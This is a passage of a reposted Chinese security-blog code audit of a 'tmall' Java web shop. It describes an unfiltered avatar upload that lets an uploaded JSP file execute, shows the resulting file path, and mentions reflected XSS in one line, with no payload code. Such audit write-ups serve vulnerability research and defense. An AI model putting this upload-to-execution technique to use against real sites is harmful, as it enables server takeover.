0px; outline: 0px; max-width: 1000%; color: #ef3564; --darkreader-inline-outline: initial; --darkreader-inline-color: #f0426e; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="" data-darkreader-inline-color="">"172.16.183.129"</span></span>

            任意文件上传
            同上,就是头像上传功能:

            获取文件名,然后去掉多余的“.”。名字是随机的uuid,拼接路径,然后上传,没有做过滤。
            上传一个jsp试试:

             

            <span class="code-snippet_outer" style="margin: 0px; padding: 0px; outline: 0px; max-width: 1000%; --darkreader-inline-outline: initial; box-sizing: border-box !important; overflow-wrap: break-word !important;" data-darkreader-inline-outline="">/tmall/res/images/item/userProfilePicture/e4b3a476-a492-446b-b033-e54f4b152c7c.jsp</span>
            发现jsp被执行了,为什么?因为在pom添加了解析库,大多数项目是不会添加的:

            反射xss
            牢记四字:见框就插。

            4
            总结
            有任何问题,可以在评论区留言,我们共同探讨,共同进步!

            本文转载自: 酒仙桥六号部队

            如若转载,请注明出处: https://mp.weixin.qq.com/s/jJ3iBNUnFFJOgJnf5mJ6TQ

            安全KER - 有思想的安全新媒体

            分享到:微信
            +16赞
            收藏
            安全客
            分享到:微信

            发表评论

            安全客

            有思想的安全新媒体

            • 文章
            • 3687
            • 粉丝
            • 225

            TA的文章

            相关文章

            热门推荐

              文章目录
              安全KER
              商务合作
              内容需知
              合作单位
              • 安全KER
              • 安全KER
              Copyright © 北京奇虎科技有限公司 三六零数字安全科技集团有限公司 安全KER All Rights Reserved 京ICP备08010314号-66